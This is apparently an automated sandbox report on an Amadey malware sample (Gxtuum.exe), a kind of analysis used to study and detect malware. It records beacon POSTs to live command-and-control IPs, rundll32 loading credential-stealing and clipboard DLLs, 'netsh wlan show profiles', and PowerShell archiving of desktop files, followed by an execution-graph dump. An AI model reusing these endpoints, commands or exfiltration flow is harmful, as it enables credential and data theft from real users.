                                                              Dec 13, 2024 07:48:55.053936005 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:48:56.359826088 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:55 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              87192.168.2.449945185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:55.053939104 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:48:56.359931946 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:55 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              88192.168.2.449952185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:58.260186911 CET307OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:48:59.706650019 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:59 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              89192.168.2.449953185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:58.260914087 CET310OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:48:59.678570032 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:58 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              90192.168.2.449963185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:49:01.423562050 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:49:02.785298109 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:49:02 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              91192.168.2.449964185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:49:01.456741095 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:49:02.838046074 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:49:02 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              92192.168.2.449970185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:49:04.424305916 CET310OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:49:05.785996914 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:49:05 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              93192.168.2.449971185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:49:04.470860004 CET307OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:49:05.831302881 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:49:05 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              94192.168.2.449982185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:49:07.532891035 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:49:08.876770973 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:49:08 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Click to jump to process

                                                              Click to jump to process

                                                              Click to dive into process behavior distribution

                                                              Click to jump to process

                                                              Target ID:0
                                                              Start time:01:47:01
                                                              Start date:13/12/2024
                                                              Path:C:\Users\user\Desktop\tOuVwTJrau.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\tOuVwTJrau.exe"
                                                              Imagebase:0x2e0000
                                                              File size:441'344 bytes
                                                              MD5 hash:4962575A2378D5C72E7A836EA766E2AD
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:1
                                                              Start time:01:47:02
                                                              Start date:13/12/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"
                                                              Imagebase:0xe0000
                                                              File size:441'344 bytes
                                                              MD5 hash:4962575A2378D5C72E7A836EA766E2AD
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe, Author: Joe Security
                                                              Antivirus matches:
                                                              • Detection: 100%, Joe Sandbox ML
                                                              • Detection: 66%, ReversingLabs
                                                              Reputation:low
                                                              Has exited:false

                                                              Target ID:2
                                                              Start time:01:47:02
                                                              Start date:13/12/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              Imagebase:0xe0000
                                                              File size:441'344 bytes
                                                              MD5 hash:4962575A2378D5C72E7A836EA766E2AD
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:3
                                                              Start time:01:47:07
                                                              Start date:13/12/2024
                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                                                              Imagebase:0xe60000
                                                              File size:61'440 bytes
                                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:4
                                                              Start time:01:47:07
                                                              Start date:13/12/2024
                                                              Path:C:\Windows\System32\rundll32.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                                                              Imagebase:0x7ff754830000
                                                              File size:71'680 bytes
                                                              MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:5
                                                              Start time:01:47:07
                                                              Start date:13/12/2024
                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                                                              Imagebase:0xe60000
                                                              File size:61'440 bytes
                                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:6
                                                              Start time:01:47:07
                                                              Start date:13/12/2024
                                                              Path:C:\Windows\System32\rundll32.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                                                              Imagebase:0x7ff754830000
                                                              File size:71'680 bytes
                                                              MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:7
                                                              Start time:01:47:08
                                                              Start date:13/12/2024
                                                              Path:C:\Windows\System32\netsh.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:netsh wlan show profiles
                                                              Imagebase:0x7ff7ce700000
                                                              File size:96'768 bytes
                                                              MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              Target ID:8
                                                              Start time:01:47:08
                                                              Start date:13/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:9
                                                              Start time:01:47:08
                                                              Start date:13/12/2024
                                                              Path:C:\Windows\System32\netsh.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:netsh wlan show profiles
                                                              Imagebase:0x7ff7ce700000
                                                              File size:96'768 bytes
                                                              MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:10
                                                              Start time:01:47:08
                                                              Start date:13/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:11
                                                              Start time:01:47:11
                                                              Start date:13/12/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                                                              Imagebase:0x7ff788560000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:12
                                                              Start time:01:47:11
                                                              Start date:13/12/2024
                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main
                                                              Imagebase:0xe60000
                                                              File size:61'440 bytes
                                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              Target ID:13
                                                              Start time:01:47:12
                                                              Start date:13/12/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                                                              Imagebase:0x7ff788560000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:14
                                                              Start time:01:47:12
                                                              Start date:13/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:15
                                                              Start time:01:47:12
                                                              Start date:13/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:16
                                                              Start time:01:47:12
                                                              Start date:13/12/2024
                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main
                                                              Imagebase:0xe60000
                                                              File size:61'440 bytes
                                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              Target ID:20
                                                              Start time:01:48:01
                                                              Start date:13/12/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              Imagebase:0xe0000
                                                              File size:441'344 bytes
                                                              MD5 hash:4962575A2378D5C72E7A836EA766E2AD
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:22
                                                              Start time:01:49:00
                                                              Start date:13/12/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              Imagebase:0xe0000
                                                              File size:441'344 bytes
                                                              MD5 hash:4962575A2378D5C72E7A836EA766E2AD
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:2.1%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:33.8%
                                                                Total number of Nodes:477
                                                                Total number of Limit Nodes:10
                                                                execution_graph 27073 3177a2 27078 317578 27073->27078 27076 3177e1 27079 317597 27078->27079 27080 3175aa 27079->27080 27084 3175bf 27079->27084 27098 311652 14 API calls __dosmaperr 27080->27098 27082 3175af 27099 30f409 25 API calls __wsopen_s 27082->27099 27093 3176df 27084->27093 27100 3236fe 37 API calls 2 library calls 27084->27100 27086 3175ba 27086->27076 27095 323e6f 27086->27095 27087 317790 27104 30f409 25 API calls __wsopen_s 27087->27104 27090 31772f 27090->27093 27101 3236fe 37 API calls 2 library calls 27090->27101 27092 31774d 27092->27093 27102 3236fe 37 API calls 2 library calls 27092->27102 27093->27086 27103 311652 14 API calls __dosmaperr 27093->27103 27105 323834 27095->27105 27098->27082 27099->27086 27100->27090 27101->27092 27102->27093 27103->27087 27104->27086 27107 323840 __FrameHandler3::FrameUnwindToState 27105->27107 27106 323847 27125 311652 14 API calls __dosmaperr 27106->27125 27107->27106 27110 323872 27107->27110 27109 32384c 27126 30f409 25 API calls __wsopen_s 27109->27126 27116 323e01 27110->27116 27115 323856 27115->27076 27128 30ed09 27116->27128 27121 323e37 27123 323896 27121->27123 27182 3185a6 14 API calls _free 27121->27182 27127 3238c9 LeaveCriticalSection __wsopen_s 27123->27127 27125->27109 27126->27115 27127->27115 27183 30e5e7 27128->27183 27131 30ed2d 27133 30ecec 27131->27133 27195 30ec3a 27133->27195 27136 323e8f 27137 323eac 27136->27137 27138 323ec1 27137->27138 27139 323eda 27137->27139 27234 31163f 14 API calls __dosmaperr 27138->27234 27220 31a755 27139->27220 27143 323ec6 27235 311652 14 API calls __dosmaperr 27143->27235 27144 323ee8 27236 31163f 14 API calls __dosmaperr 27144->27236 27145 323eff 27233 323b48 CreateFileW 27145->27233 27149 323eed 27237 311652 14 API calls __dosmaperr 27149->27237 27150 323ed3 27150->27121 27152 323fb5 GetFileType 27153 323fc0 GetLastError 27152->27153 27154 324007 27152->27154 27240 31161c 14 API calls 2 library calls 27153->27240 27242 31a6a0 15 API calls 3 library calls 27154->27242 27155 323f8a GetLastError 27239 31161c 14 API calls 2 library calls 27155->27239 27157 323f38 27157->27152 27157->27155 27238 323b48 CreateFileW 27157->27238 27159 323fce CloseHandle 27159->27143 27161 323ff7 27159->27161 27241 311652 14 API calls __dosmaperr 27161->27241 27163 323f7d 27163->27152 27163->27155 27165 324028 27167 324074 27165->27167 27243 323d57 71 API calls 4 library calls 27165->27243 27166 323ffc 27166->27143 27171 32407b 27167->27171 27245 3238f5 71 API calls 4 library calls 27167->27245 27170 3240a9 27170->27171 27173 3240b7 27170->27173 27244 3186f9 28 API calls 2 library calls 27171->27244 27173->27150 27174 324133 CloseHandle 27173->27174 27246 323b48 CreateFileW 27174->27246 27176 32415e 27177 324082 27176->27177 27178 324168 GetLastError 27176->27178 27177->27150 27247 31161c 14 API calls 2 library calls 27178->27247 27180 324174 27248 31a868 15 API calls 3 library calls 27180->27248 27182->27123 27184 30e607 27183->27184 27190 30e5fe 27183->27190 27184->27190 27192 3171c0 37 API calls 3 library calls 27184->27192 27186 30e627 27193 3179e6 37 API calls __Getctype 27186->27193 27188 30e63d 27194 317a13 37 API calls __fassign 27188->27194 27190->27131 27191 318bff 5 API calls std::_Lockit::_Lockit 27190->27191 27191->27131 27192->27186 27193->27188 27194->27190 27196 30ec62 27195->27196 27197 30ec48 27195->27197 27198 30ec88 27196->27198 27199 30ec69 27196->27199 27213 30ed48 14 API calls _free 27197->27213 27215 318823 MultiByteToWideChar 27198->27215 27212 30ec52 27199->27212 27214 30ed62 15 API calls __wsopen_s 27199->27214 27203 30ec97 27204 30ec9e GetLastError 27203->27204 27209 30ecc4 27203->27209 27218 30ed62 15 API calls __wsopen_s 27203->27218 27216 31161c 14 API calls 2 library calls 27204->27216 27207 30ecaa 27217 311652 14 API calls __dosmaperr 27207->27217 27209->27212 27219 318823 MultiByteToWideChar 27209->27219 27210 30ecdb 27210->27204 27210->27212 27212->27121 27212->27136 27213->27212 27214->27212 27215->27203 27216->27207 27217->27212 27218->27209 27219->27210 27221 31a761 __FrameHandler3::FrameUnwindToState 27220->27221 27249 312ae0 EnterCriticalSection 27221->27249 27223 31a7af 27250 31a85f 27223->27250 27225 31a768 27225->27223 27226 31a78d 27225->27226 27230 31a7fc EnterCriticalSection 27225->27230 27253 31a52f 15 API calls 3 library calls 27226->27253 27229 31a792 27229->27223 27254 31a67d EnterCriticalSection 27229->27254 27230->27223 27231 31a809 LeaveCriticalSection 27230->27231 27231->27225 27233->27157 27234->27143 27235->27150 27236->27149 27237->27143 27238->27163 27239->27143 27240->27159 27241->27166 27242->27165 27243->27167 27244->27177 27245->27170 27246->27176 27247->27180 27248->27177 27249->27225 27255 312b28 LeaveCriticalSection 27250->27255 27252 31a7cf 27252->27144 27252->27145 27253->27229 27254->27223 27255->27252 27256 30a528 27257 30a534 __FrameHandler3::FrameUnwindToState 27256->27257 27282 30a24e 27257->27282 27259 30a53b 27260 30a694 27259->27260 27270 30a565 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 27259->27270 27305 30a895 4 API calls 2 library calls 27260->27305 27262 30a69b 27306 30e34e 27262->27306 27266 30a6a9 27267 30a584 27268 30a605 27290 31470b 27268->27290 27270->27267 27270->27268 27304 30e328 37 API calls 3 library calls 27270->27304 27272 30a60b 27294 3011a0 27272->27294 27283 30a257 27282->27283 27310 30aa7f IsProcessorFeaturePresent 27283->27310 27285 30a263 27311 30cb69 10 API calls 2 library calls 27285->27311 27287 30a268 27289 30a26c 27287->27289 27312 30cb88 7 API calls 2 library calls 27287->27312 27289->27259 27291 314714 27290->27291 27293 314719 27290->27293 27313 314266 49 API calls 27291->27313 27293->27272 27295 3011ab 27294->27295 27314 2f1600 27295->27314 27297 3011b5 27298 2f1dd0 119 API calls 27297->27298 27299 3011ba 27298->27299 27300 2ff750 125 API calls 27299->27300 27301 3011bf 27300->27301 27302 301150 CreateThread CreateThread CreateThread 27301->27302 27303 301190 Sleep 27302->27303 27303->27303 27304->27268 27305->27262 27584 30e1ec 27306->27584 27309 30e312 23 API calls __FrameHandler3::FrameUnwindToState 27309->27266 27310->27285 27311->27287 27312->27289 27313->27293 27319 303730 27314->27319 27316 2f1652 27335 2e61f0 27316->27335 27318 2f165d 27320 30375b 27319->27320 27321 303762 27320->27321 27322 3037b4 27320->27322 27323 303795 27320->27323 27321->27316 27330 3037a9 _Yarn 27322->27330 27499 2e25c0 26 API calls 3 library calls 27322->27499 27324 3037ea 27323->27324 27325 30379c 27323->27325 27500 2e25c0 26 API calls 3 library calls 27324->27500 27498 2e25c0 26 API calls 3 library calls 27325->27498 27329 3037a2 27329->27330 27501 30f419 27329->27501 27330->27316 27508 2e5da0 27335->27508 27341 2e630f 27344 30f419 25 API calls 27341->27344 27342 2e62e9 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 27523 309db0 27342->27523 27347 2e6314 __fread_nolock 27344->27347 27345 2e625f 